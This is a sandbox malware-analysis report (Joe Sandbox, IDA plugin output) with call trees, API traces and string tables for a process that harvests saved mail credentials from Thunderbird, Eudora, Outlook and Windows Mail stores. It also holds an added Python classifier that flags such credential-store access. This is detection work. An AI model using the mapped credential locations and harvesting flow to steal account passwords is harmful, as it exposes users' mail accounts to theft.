• 40cf44 (main routine): 404a99 (LoadLibraryA, GetProcAddress, FreeLibrary, MessageBoxA); 410d0e (LoadLibraryA, GetProcAddress); 40ccd7 (??2@YAPAXI, DeleteObject; 407088: memset, _mbscpy, CreateFontIndirectA; 4019b5: strncat, memset, LoadIconA); 407cbc (malloc, memcpy, ??3@YAXPAX; 40796e 7 API calls); 409825 and 4096f4 (GetModuleFileNameA, strrchr, _mbscat, _mbscpy, EnumResourceNamesA, LoadStringA, GetFileAttributesA, GetPrivateProfileIntA, GetPrivateProfileStringA, WritePrivateProfileStringA, _itoa); 407e30 _strcmpi; 40cff2 RegDeleteKeyA; 40d007 EnumResourceTypesA; 40d02f MessageBoxA; 40ce70 (next section); 40d0a0 CoInitialize; 40cc26 (strncat, memset, RegisterClassA, CreateWindowExA); 40d0b1 (ShowWindow, UpdateWindow, LoadAcceleratorsA); 40c256 PostMessageA; message loop at 40d0f9 (GetMessageA, TranslateAccelerator, IsDialogMessage, TranslateMessage, DispatchMessageA); clean-up at 40d181 / 40d19f (??3@YAXPAX, DeleteObject), 407948, 4080d4.

Registry and profile walk, list population, output (40ce70, called from 40cf44)
• 4023b2 (409c1c: memcpy, ??2@YAPAXI, ??3@YAXPAX); 401e69 (memset; 410dbb: GetVersionExA, RegOpenKeyExA, _mbscpy, RegQueryValueExA, RegCloseKey; 4070e3: strlen, _mbscat, _mbscpy; 406f81 GetFileAttributesA; 401c31: RegOpenKeyExA, RegQueryValueExA, strchr, RegCloseKey, 406f06 strlen/memcpy; 410a9c RegOpenKeyExA; 401f9c memset; 410b62 RegEnumKeyExA; 401fd9 atoi; 401fef memset/sprintf; 410b1e: RegOpenKeyExA, RegQueryValueExA, RegCloseKey; 402167 _mbscpy; 40217e RegCloseKey; 402195 ExpandEnvironmentStringsA; 4021a8 _strcmpi).
• 40cdda (7 API calls); 40c3d0 (memset, GetModuleFileNameA, strrchr, _mbscat, _mbscpy); 40c502 GetWindowPlacement; 4017d2 (GetSystemMetrics, SetWindowPos); 409b31 (409901 memset/SendMessageA, 409868 SendMessageA).
• 40ba28: 406c62 (LoadCursorA, SetCursor); 404734 (LoadLibraryA, GetProcAddress, FreeLibrary); 403c16 (next section); 404785 FreeLibrary; 410a9c RegOpenKeyExA; 4107f1 FreeLibrary; 40ba43 _mbsicmp; 40b5e5 (10 API calls); 407e30 _strcmpi; 40baf1 qsort; 40bafa SetCursor.
• 40affa (writes the result to a file or to a standard handle): 409ded (SendMessageA, ??2@YAPAXI, ??3@YAXPAX); either 406d1a CreateFileA or 40b01f GetStdHandle; 40a57c (strlen, WriteFile); 40a699 (12 API calls); 406d77 (9 API calls); 40b116 CloseHandle; 40b11f SetCursor; 40c580 (28 API calls).

Credential and profile collection (403c16, called from 40ba28; its subtree holds CredEnumerateW and the registry and .ini readers)
• Set-up: 4107f1 FreeLibrary; 403c30 LoadLibraryA; 403c44 GetProcAddress; 404734 (3 API calls).
• 4036e5, called four times (once expanded, three times as 26 API calls): 410863 (UuidFromStringA twice, memcpy); 403716 strchr; 4021b6 memset; 40373f (_mbscpy, strlen); 403789 sprintf; 4037a4 _mbscpy; 4023e5 (16 API calls).
• 4085d2: 4082cd (11 API calls); 410a9c RegOpenKeyExA; 40860b memset; 410b62 RegEnumKeyExA; 40865c memset; 410add RegQueryValueExA; 40848b (10 API calls); 4086ab and 4086d2 RegCloseKey.
• 40821d: 410a9c RegOpenKeyExA; 408246 memset; 410b62 RegEnumKeyExA; 4080ed (11 API calls); 4082a2 and 4082bf RegCloseKey.
• 4086e0: 4045db (LoadLibraryA, GetProcAddress five times, FreeLibrary); 40872b CredEnumerateW; 408737 wcslen; 40877a _wcsncoll; 404734 (3 API calls); 404785 FreeLibrary; 408812 memset; 40883c (memcpy, wcschr); 40466b _mbscpy; 4088c3 LocalFree; then 404656 FreeLibrary.
• 402bd1 (39 API calls) twice, each after 410a9c RegOpenKeyExA; 402c5d (RegOpenKeyExA, 402c87 memset, RegEnumKeyExA, 410b1e, 402ce4 memset/sprintf, 402d3a sprintf, 402bd1, 402d9c RegCloseKey); 4070ae GetVersionExA; 402b22 (46 API calls) three times, each after RegOpenKeyExA; 410808 then 4107f1 FreeLibrary; 404785 FreeLibrary.
• 402fdb twice (once expanded, once as 34 API calls): RegOpenKeyExA, 403006 memset, RegEnumKeyExA, 410b1e, 403058 memset/sprintf, 4030a2 memset, 402db3 (26 API calls), 4030f9 and 403122 RegCloseKey.
• 4032b7: 4021b6 memset; 403166 (strlen, GetPrivateProfileStringA, strchr, memcpy); 4032f8 (memset, GetPrivateProfileSectionA); 403350 strchr; 40339b strlen; 4023e5 (16 API calls); 4034e4 (memset; 410b1e; 403546 _mbscpy; 406d55 strlen/_mbscat; 403565 _mbscat; 4033f0 19 API calls); 403985 (40466b _mbscpy; 40f460: memset, 4078ba _mbsnbcat, 40f5a3 RegOpenKeyExA, 40f5c3 and 40f69e RegQueryValueExA, 40466b _mbscpy, 404734, 40f6d0 RegCloseKey; 40f6e2; 4038e8 21 API calls; 404785 FreeLibrary); 4037ca (memset; 444551 memset; 406f06 strlen/memcpy; 403855 strchr; 403884 and 4038bf _mbscpy; 403897 strlen; 4038a4 sprintf; 4023e5); 40f334 (334 API calls).
• 403e46 _mbscpy then 40f334 (334 API calls); 40fb00 (40fb10 and 40fb3b RegOpenKeyExA, 40fb55 RegQueryValueExA, 404734, 40fbdd memcpy twice, 40f802 11 API calls, 40fc19 LocalFree, 40fc23 and 40fc2d RegCloseKey).
• 40f96c: 4070ae GetVersionExA; 4045db (7 API calls); 40fa13 (memset, WideCharToMultiByte); 40fa43 _strnicmp; 40fa5b and 40fa88 WideCharToMultiByte; 404656 FreeLibrary.
• 4442ea: memset; 410dbb (9 API calls) twice; 40759e strlen twice; 444212 (65 API calls) twice; 444366 memset; 410b1e; 4443b9 (ExpandEnvironmentStringsA, strlen); 4443f4 _strcmpi.

Roots exported without edges
• 40fc40 (70 API calls); 403640 (21); 427fa4 (42); 412e43 _endthreadex; 425115 (76 and 83 API calls, __fprintf_l); 43fe40 (133); 401445 (memcpy twice, DialogBoxParamA); 440c40 (34).
33705->33699 33706 40f6c1 33705->33706 33706->33699 33707 40f66a 33708 404785 FreeLibrary 33707->33708 33708->33710 33709->33707 33711 40f661 LocalFree 33709->33711 33712 40f645 memcpy 33709->33712 33710->33699 33735 4012ee strlen 33710->33735 33711->33707 33712->33711 33736 40466b _mbscpy 33713->33736 33715 40f6fa 33716 4045db 7 API calls 33715->33716 33717 40f708 33716->33717 33718 404734 3 API calls 33717->33718 33724 40f7e2 33717->33724 33720 40f715 33718->33720 33719 404656 FreeLibrary 33721 40f7f1 33719->33721 33720->33724 33725 40f797 WideCharToMultiByte 33720->33725 33722 404785 FreeLibrary 33721->33722 33723 40f7fc 33722->33723 33723->33570 33724->33719 33726 40f7b8 strlen 33725->33726 33727 40f7d9 LocalFree 33725->33727 33726->33727 33728 40f7c8 _mbscpy 33726->33728 33727->33724 33728->33727 33729->33570 33731 4078e6 33730->33731 33732 4078c7 _mbsnbcat 33731->33732 33733 4078ea 33731->33733 33732->33731 33733->33695 33734->33702 33735->33705 33736->33715 33750 410a9c RegOpenKeyExA 33737->33750 33739 40381a 33739->33578 33748 4021b6 memset 33739->33748 33740 44458b 33740->33739 33751 410add RegQueryValueExA 33740->33751 33742 4445a4 33743 4445dc RegCloseKey 33742->33743 33752 410add RegQueryValueExA 33742->33752 33743->33739 33745 4445c1 33745->33743 33753 444879 30 API calls 33745->33753 33747 4445da 33747->33743 33748->33580 33749->33578 33750->33740 33751->33742 33752->33745 33753->33747 33754->33601 33756 4075c9 33755->33756 33757 4075bb _mbscat 33755->33757 33758 444212 33756->33758 33757->33756 33775 407e9d 33758->33775 33761 44424d 33762 444274 33761->33762 33764 444258 33761->33764 33783 407ef8 33761->33783 33763 407e9d 9 API calls 33762->33763 33772 4442a0 33763->33772 33796 444196 52 API calls 33764->33796 33766 407ef8 9 API calls 33766->33772 33767 4442ce 33793 407f90 33767->33793 33771 407f90 FindClose 33773 4442e4 33771->33773 33772->33766 33772->33767 33774 444212 65 API calls 33772->33774 33797 407e62 strcmp strcmp 33772->33797 33773->33623 
33774->33772 33776 407f90 FindClose 33775->33776 33777 407eaa 33776->33777 33778 406f06 2 API calls 33777->33778 33779 407ebd strlen strlen 33778->33779 33780 407ee1 33779->33780 33782 407eea 33779->33782 33798 4070e3 strlen _mbscat _mbscpy _mbscat 33780->33798 33782->33761 33784 407f03 FindFirstFileA 33783->33784 33785 407f24 FindNextFileA 33783->33785 33786 407f3f 33784->33786 33787 407f46 strlen strlen 33785->33787 33788 407f3a 33785->33788 33786->33787 33790 407f7f 33786->33790 33787->33790 33791 407f76 33787->33791 33789 407f90 FindClose 33788->33789 33789->33786 33790->33761 33799 4070e3 strlen _mbscat _mbscpy _mbscat 33791->33799 33794 407fa3 33793->33794 33795 407f99 FindClose 33793->33795 33794->33771 33795->33794 33796->33761 33797->33772 33798->33782 33799->33790 33800->33223 33801->33227 33802->33234 33803->33233 33804->33240 33805->33237 33806->33232 33815 411853 RtlInitializeCriticalSection memset 33816 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33989 40a256 13 API calls 33991 432e5b 17 API calls 33993 43fa5a 20 API calls 33818 401060 41 API calls 33996 427260 CloseHandle memset memset 32916 410c68 FindResourceA 32917 410c81 SizeofResource 32916->32917 32920 410cae 32916->32920 32918 410c92 LoadResource 32917->32918 32917->32920 32919 410ca0 LockResource 32918->32919 32918->32920 32919->32920 33998 405e69 14 API calls 33823 433068 15 API calls __fprintf_l 34000 414a6d 18 API calls 34001 43fe6f 134 API calls 33825 424c6d 15 API calls __fprintf_l 34002 426741 19 API calls 33827 440c70 17 API calls 33828 443c71 44 API calls 33831 427c79 24 API calls 34005 416e7e memset __fprintf_l 33835 42800b 47 API calls 33836 425115 82 API calls __fprintf_l 34008 41960c 61 API calls 33837 43f40c 122 API calls __fprintf_l 33840 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33841 43f81a 20 API calls 33843 414c20 memset memset 33844 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34012 414625 18 
API calls 34013 404225 modf 34014 403a26 strlen WriteFile 34016 40422a 12 API calls 34020 427632 memset memset memcpy 34021 40ca30 59 API calls 32903 44b435 VirtualProtect 32904 44b444 VirtualProtect 32903->32904 32905 44b454 32903->32905 32904->32905 34022 404235 26 API calls 33846 425115 76 API calls __fprintf_l 34023 425115 77 API calls __fprintf_l 34025 44223a 38 API calls 33852 43183c 112 API calls 34026 44b2c5 _onexit __dllonexit 34031 42a6d2 memcpy __allrem 33854 405cda 65 API calls 34039 43fedc 138 API calls 34040 4116e1 16 API calls __fprintf_l 33857 4244e6 19 API calls 33859 42e8e8 127 API calls __fprintf_l 33860 4118ee RtlLeaveCriticalSection 34045 43f6ec 22 API calls 33862 425115 119 API calls __fprintf_l 32906 410cf3 EnumResourceNamesA 34048 4492f0 memcpy memcpy 34050 43fafa 18 API calls 34052 4342f9 15 API calls __fprintf_l 33863 4144fd 19 API calls 34054 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34055 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34058 443a84 _mbscpy 34060 43f681 17 API calls 33866 404487 22 API calls 34062 415e8c 16 API calls __fprintf_l 33870 411893 RtlDeleteCriticalSection __fprintf_l 33871 41a492 42 API calls 34066 403e96 34 API calls 34067 410e98 memset SHGetPathFromIDList SendMessageA 33873 426741 109 API calls __fprintf_l 33874 4344a2 18 API calls 33875 4094a2 10 API calls 34070 4116a6 15 API calls __fprintf_l 34071 43f6a4 17 API calls 34072 440aa3 20 API calls 34074 427430 45 API calls 33878 4090b0 7 API calls 33879 4148b0 15 API calls 33881 4118b4 RtlEnterCriticalSection 33882 4014b7 CreateWindowExA 33883 40c8b8 19 API calls 33885 4118bf RtlTryEnterCriticalSection 34079 42434a 18 API calls __fprintf_l 34081 405f53 12 API calls 33893 43f956 59 API calls 33895 40955a 17 API calls 33896 428561 36 API calls 33897 409164 7 API calls 34085 404366 19 API calls 34089 40176c ExitProcess 34092 410777 42 API calls 33902 40dd7b 51 API calls 33903 425d7c 16 API calls __fprintf_l 34094 43f6f0 25 
API calls 34095 42db01 22 API calls 33904 412905 15 API calls __fprintf_l 34096 403b04 54 API calls 34097 405f04 SetDlgItemTextA GetDlgItemTextA 34098 44b301 ??3@YAXPAX 34101 4120ea 14 API calls 3 library calls 34102 40bb0a 8 API calls 34104 413f11 strcmp 33908 434110 17 API calls __fprintf_l 33910 425115 108 API calls __fprintf_l 34105 444b11 _onexit 33912 425115 76 API calls __fprintf_l 33915 429d19 10 API calls 34108 444b1f __dllonexit 34109 409f20 _strcmpi 33917 42b927 31 API calls 34112 433f26 19 API calls __fprintf_l 34113 44b323 FreeLibrary 34114 427f25 46 API calls 34115 43ff2b 17 API calls 34116 43fb30 19 API calls 33924 414d36 16 API calls 33926 40ad38 7 API calls 34118 433b38 16 API calls __fprintf_l 34119 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 33930 426741 21 API calls 33931 40c5c3 125 API calls 33933 43fdc5 17 API calls 34120 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33936 4161cb memcpy memcpy memcpy memcpy 34125 43ffc8 18 API calls 33937 4281cc 15 API calls __fprintf_l 34127 4383cc 110 API calls __fprintf_l 33938 4275d3 41 API calls 34128 4153d3 22 API calls __fprintf_l 33939 444dd7 _XcptFilter 34133 4013de 15 API calls 34135 425115 111 API calls __fprintf_l 34136 43f7db 18 API calls 34139 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33942 4335ee 16 API calls __fprintf_l 34141 429fef 11 API calls 33943 444deb _exit _c_exit 34142 40bbf0 138 API calls 33946 425115 79 API calls __fprintf_l 34146 437ffa 22 API calls 33950 4021ff 14 API calls 33951 43f5fc 149 API calls 34147 40e381 9 API calls 33953 405983 40 API calls 33954 42b186 27 API calls __fprintf_l 33955 427d86 76 API calls 33956 403585 20 API calls 33958 42e58e 18 API calls __fprintf_l 33961 425115 75 API calls __fprintf_l 33963 401592 8 API calls 32907 410b92 32910 410a6b 32907->32910 32909 410bb2 32911 410a77 32910->32911 32912 410a89 GetPrivateProfileIntA 32910->32912 32915 410983 memset _itoa WritePrivateProfileStringA 32911->32915 32912->32909 
32914 410a84 32914->32909 32915->32914 34151 434395 16 API calls 33965 441d9c memcmp 34153 43f79b 119 API calls 33966 40c599 43 API calls 34154 426741 87 API calls 33970 4401a6 21 API calls 33972 426da6 memcpy memset memset memcpy 33973 4335a5 15 API calls 33975 4299ab memset memset memcpy memset memset 33976 40b1ab 8 API calls 34159 425115 76 API calls __fprintf_l 34163 4113b2 18 API calls 2 library calls 34167 40a3b8 memset sprintf SendMessageA 32921 410bbc 32924 4109cf 32921->32924 32925 4109dc 32924->32925 32926 410a23 memset GetPrivateProfileStringA 32925->32926 32927 4109ea memset 32925->32927 32932 407646 strlen 32926->32932 32937 4075cd sprintf memcpy 32927->32937 32930 410a0c WritePrivateProfileStringA 32931 410a65 32930->32931 32933 40765a 32932->32933 32935 40765c 32932->32935 32933->32931 32934 4076a3 32934->32931 32935->32934 32938 40737c strtoul 32935->32938 32937->32930 32938->32935 33978 40b5bf memset memset _mbsicmp

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040832F
                                                                                              • memset.MSVCRT ref: 00408343
                                                                                              • memset.MSVCRT ref: 0040835F
                                                                                              • memset.MSVCRT ref: 00408376
                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                              • strlen.MSVCRT ref: 004083E9
                                                                                              • strlen.MSVCRT ref: 004083F8
                                                                                              • memcpy.MSVCRT ref: 0040840A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                              • API String ID: 1832431107-3760989150
                                                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                              • strlen.MSVCRT ref: 00407F5C
                                                                                              • strlen.MSVCRT ref: 00407F64
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindstrlen$FirstNext
                                                                                              • String ID: ACD
                                                                                              • API String ID: 379999529-620537770
                                                                                              • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                              • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00401E8B
                                                                                              • strlen.MSVCRT ref: 00401EA4
                                                                                              • strlen.MSVCRT ref: 00401EB2
                                                                                              • strlen.MSVCRT ref: 00401EF8
                                                                                              • strlen.MSVCRT ref: 00401F06
                                                                                              • memset.MSVCRT ref: 00401FB1
                                                                                              • atoi.MSVCRT ref: 00401FE0
                                                                                              • memset.MSVCRT ref: 00402003
                                                                                              • sprintf.MSVCRT ref: 00402030
                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                              • memset.MSVCRT ref: 00402086
                                                                                              • memset.MSVCRT ref: 0040209B
                                                                                              • strlen.MSVCRT ref: 004020A1
                                                                                              • strlen.MSVCRT ref: 004020AF
                                                                                              • strlen.MSVCRT ref: 004020E2
                                                                                              • strlen.MSVCRT ref: 004020F0
                                                                                              • memset.MSVCRT ref: 00402018
                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                              • _mbscpy.MSVCRT ref: 00402177
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                              • API String ID: 1846531875-4223776976
                                                                                              • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                              • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
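The "APIs" and "String ID" entries in this section, and in every other per-function section of the report, follow one fixed layout: a bullet per resolved call (`Api.MODULE(args), ref: ADDR`, with `Part of subcall function ADDR:` prefixed when the call happens inside a callee) and a `$`-joined string table. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses those entries into records, splits the string table, and flags the mail-client credential stores the strings name, so the pattern visible in this section (registry walk plus Thunderbird and Eudora paths) can be picked out of many such sections mechanically. The regexes are my reading of the printed layout, the sample lines are copied from this section, and the one-line descriptions of each store location are general knowledge of those clients, not something the report states.

```python
"""Parse a Joe Sandbox per-function 'APIs' list and 'String ID' field and
flag mail-client credential stores.  Added example; not report or plugin code."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# "• [Part of subcall function ADDR: ]Api.MODULE[(args)][,] ref: ADDR"  (my reading of the layout)
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.\s(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple[str, ...]
    ref: int                 # address of the call site
    subcall: Optional[int]   # callee address when marked "Part of subcall function", else None


def parse_api_lines(text: str) -> list[ApiCall]:
    """One ApiCall per bullet; lines that do not match the layout are skipped."""
    calls = []
    for raw in text.splitlines():
        m = _LINE.match(raw)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def parse_string_ids(line: str) -> list[str]:
    """Split the '$'-joined 'String ID' field.  Caveat: the report does no escaping,
    so a referenced string that itself contains '$' cannot be told from a separator."""
    body = line.split("String ID:", 1)[-1]
    return [s.strip() for s in body.split("$") if s.strip()]


# Where mail clients keep account data.  Paths are the ones the report's string
# tables show; the descriptions are general knowledge, not taken from the report.
MAIL_STORE_MARKERS = {
    r"Software\Microsoft\Internet Account Manager\Accounts": "Outlook Express / Windows Mail accounts",
    r"Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts": "Outlook (Internet Mail Only) accounts",
    r"Windows Messaging Subsystem\Profiles": "Outlook MAPI profiles",
    r"Software\Qualcomm\Eudora\CommandLine": "Eudora install location",
    r"Software\Mozilla\Mozilla Thunderbird": "Thunderbird install location",
    r"Thunderbird\Profiles": "Thunderbird profile directory (stored logins live here)",
    "nss3.dll": "NSS library Thunderbird uses to decrypt stored logins",
    "pstorec.dll": "Protected Storage (legacy IE / Outlook Express passwords)",
    "*.oeaccount": "Windows Mail / Windows Live Mail account files",
}
REGISTRY_APIS = {"RegOpenKeyExA", "RegEnumKeyExA", "RegQueryValueExA", "RegCloseKey"}
CREDENTIAL_APIS = {"CredEnumerateW", "PStoreCreateInstance"}   # the latter shows up as a GetProcAddress argument
FILE_WALK_APIS = {"FindFirstFileA", "FindNextFileA"}


def classify(calls: list[ApiCall], strings: list[str]) -> dict:
    """Registry or file walking alone is generic; the same walking next to strings that
    name mail-client stores (or a credential API) is what marks a harvesting routine."""
    registry = sum(1 for c in calls if c.api in REGISTRY_APIS)
    file_walk = sum(1 for c in calls if c.api in FILE_WALK_APIS)
    cred_apis = sorted({c.api for c in calls if c.api in CREDENTIAL_APIS}
                       | {a for c in calls for a in c.args if a in CREDENTIAL_APIS})
    stores = {s: d for s in strings for k, d in MAIL_STORE_MARKERS.items() if k in s}
    harvesting = bool(stores) and (registry > 0 or file_walk > 0 or bool(cred_apis))
    return {
        "direct_calls": sum(1 for c in calls if c.subcall is None),
        "subcall_calls": sum(1 for c in calls if c.subcall is not None),
        "registry_calls": registry,
        "file_walk_calls": file_walk,
        "credential_apis": cred_apis,
        "stores": stores,
        "verdict": "mail credential store access" if harvesting else "no mail-store indicators",
    }


# Constructed input: lines copied from the Thunderbird/Eudora section of this report.
SAMPLE_APIS = r"""
• memset.MSVCRT ref: 00401E8B
• atoi.MSVCRT ref: 00401FE0
  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
• RegCloseKey.ADVAPI32(00000000), ref: 00402181
• ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
"""
SAMPLE_STRING_ID = (
    r"String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$"
    r"Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$"
    r"Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll"
)

if __name__ == "__main__":
    result = classify(parse_api_lines(SAMPLE_APIS), parse_string_ids(SAMPLE_STRING_ID))
    for key, value in result.items():
        print(f"{key}: {value}")
```

The verdict deliberately requires both halves: the RegCloseKey / ExpandEnvironmentStringsA mix in this section is unremarkable on its own, and it is the Eudora and Thunderbird paths in the string table that turn it into a mail-credential indicator. The same logic applied to the pstorec.dll section below fires on `PStoreCreateInstance` appearing as a GetProcAddress argument rather than as an imported API, which is why the classifier looks at arguments as well as call names.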

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                              • API String ID: 745651260-375988210
                                                                                              • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                              • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                                                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
